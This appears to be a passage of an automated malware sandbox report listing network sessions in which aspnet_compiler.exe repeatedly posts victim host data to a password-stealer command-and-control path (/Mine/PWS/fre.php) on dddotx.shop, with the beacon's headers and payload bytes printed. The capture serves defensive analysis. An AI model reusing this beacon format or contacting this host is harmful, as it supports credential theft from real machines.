              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              23192.168.2.749727188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:29.841895103 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:29.847887993 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:30.582844019 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:30 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aYs4U4BG403UC4v3ys3AOLSftzY1n4iv%2FQlNy6PGw%2BntW94YWCYAU20mMUrW4Q%2FWxI7QkOo6up%2FbYJLgBab1kmLDN1ZajaUYZ0OgyaJ0nORm14lYgt8GvDpAlM3OYw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996f2091b7d14-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              24192.168.2.749728188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:30.729020119 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:30.733825922 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:31.368978024 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:31 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0pMkNMWPOWXfOWXSbdMK%2Bim7PfxH%2FMbO7K7imUulIgwmWbebGZVbWaSnxVqUtybrIfNtVY60v26qa239txkdFRq5qRKG6BqeJlzPV4Q8vFJ0eYCtA6lgXKdk06ODw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996f78a81438d-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              25192.168.2.749729188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:31.827506065 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:32.177777052 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:32.827177048 CEST571INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:32 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w5HfV4J9%2FZW7AStvCWxgeJhDQexftFoFgr7WevX4E0H2TuzHI%2BcVIdV6srY0Y3ov8qWjCC5zDhpqS8D9K9g3n%2BkwZTzoouihlQoq%2BamIp93XfzqljM%2FjkjIRaUoTvw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997009d277d0e-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              26192.168.2.749730188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:32.984972954 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:32.989856958 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:33.627873898 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:33 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YcHfoOrWcxG6OhF7xG1Qf8mnfst%2FiqonX7d0VPTP2cswqvr3COW4ifEVL3536m2AjRKtA6RrTtZSnlC8lD6MhIJSJ1mW6ez20Q1n44Rx%2FeBW0uT1NH6lhbi3jui3MA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899705afd24314-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              27192.168.2.749731188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:33.795108080 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:33.800026894 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:34.467776060 CEST563INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:34 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61bG63Y869gPnaBvGmPbCaSdLmgW0qaM9o5uU4OwFIdr0ob1%2BMaFHiqO7Psgd47popQpTWoE3eWUfUniq0xdhMVMUz8vMGPwR0ynFg8Angc9z1frfvBSRq23vhaPzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89970abc444268-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              28192.168.2.749732188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:34.624982119 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:34.631186962 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:35.317949057 CEST571INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:35 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rzQ5SXQzHhQd2S6iuTyBbwjJjKAMjkeH9W8eECs%2F6mwe5wFOWDI0HneB1eafqW4HUdDrUirf0%2BphQKOBWVx1%2FsTNW3GrXBYyRni6VRrPj2cxZf%2Fbd9TIzY%2BC23cKyA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89970fe9458c89-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              29192.168.2.749733188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:35.477791071 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:35.482686996 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:36.366451025 CEST605INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:36 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1fRRLU7CWWQVkkMcFcpns9kDNWI%2FY%2BRdgmnhDCwQZRJl28bwkOJeZoLWexN%2FfaNRXcEIJcrYOcYkW%2BtjUKmvhmSKZAc0x7z279iF98S18rmO%2Fgvb%2B9PNyipHjM56w%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997155e80433d-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              30192.168.2.749734188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:36.532704115 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:36.537688017 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:37.190291882 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:37 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2F3cZ4iDK5%2F3q9sstfWddSSfrhUxtdZt4rbz2GeEc4PuIifb0mASpT%2FnyOlnnvoqHJwVNUocvj6TrKFUGjBa%2Bv01wX2cFb4IXHs33R10dE1RplJAC1qdxLU8g9LLpg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89971bd95b0cb8-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              31192.168.2.749735188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:37.348566055 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:37.356070042 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:38.140223980 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:38 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XzH1RfkY7n7VJ7lAc3X8tzu7f5s901xzXVegSG1vuJ6iiFHGv2lW0xkNP8WVkJ%2FKuog7hdZN%2Bc4Ac0%2Blp0pcCrkzl6ufVSHe84XikjUEim%2FiFDv39Zse0wUncAxEjw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997210ac87293-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              32192.168.2.749736188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:39.235093117 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:39.239881039 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:39.901659966 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:39 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8rin9eXTDD1MO8N1rPtaZK35rNnCznZ0SsVqC4aN35Rc3ALsBG%2FeVSLlirafk8tx92P5AqRv7%2Bg%2BOsNBV95OhQPmyhjDHXzM9iJxt6Pu6kWYYQ%2FtSoZNGrSfezomg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89972cb87d42c9-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              33192.168.2.749737188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:40.072299957 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:40.078686953 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:40.752322912 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:40 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g6qXiGuk9p9UI%2FYZHM%2BFr3JOk062CHDC830ajwTByTEa6eOz13aOsO7A5RHlLWdYVKIU26CT1FsCqCV0s7AU1j2jiCRfOyAOZU1JCuBapddroDzIJjMXYCarrnUhFg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997320c398c39-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              34192.168.2.749738188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:40.905690908 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:40.911451101 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:41.579946041 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:41 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iNletTUPVbq30oQXDIq2Ynfp%2FbgboW5P3HCQuTQMvQvW90H5vgTIFUUeyzeekVyWDFVpz%2Bcuj2qphFfebZFs0b4LW8IVLLu7O4u02FZGgCfITEpOIbxBjXUNlHoOew%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89973749d41881-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              35192.168.2.749739188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:41.730624914 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:41.735559940 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:42.413814068 CEST597INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:42 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ehB6fZy7ImVIlmywnD%2BMymoTnfqD3mblXAiebiD0nc20QZdH5vAIb0hCbRZu7xxB15VulzcXS9mFDzA%2Bgd6RrZuMMGey%2FW58ILbgTfZkxLP9tbmwiP2LkRzkmzF8jw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89973c58b35e6e-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              36192.168.2.749740188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:42.565653086 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:42.570719957 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:43.241015911 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:43 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2XGiEkts0uBof99Yiiby%2BUZb4dBwcP2fr5b6Jnw0gY3rxk%2BRItaMVaKzAyL4EiSOmefBgwhSnvRp41rTXUqJoYluyY72oAW0jCpx7%2BpVauu%2BunrdKCJoAYp3BZdFVw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899741a8050f49-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              37192.168.2.749741188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:43.392992973 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:43.399884939 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:44.027549982 CEST573INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:43 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jbGVMwKSyjSee00Czb1SILgp3jVnCuvbcb3Ygk%2F%2FcoV2%2BsludqaFaTX8K8ePcGC6uBp%2BIO5HwWvx%2F4iMbikKh5dEL%2FeiuhvWb7qJ5YSjh0vjN08gCMBq28ac3mUjBg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899746b822192a-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
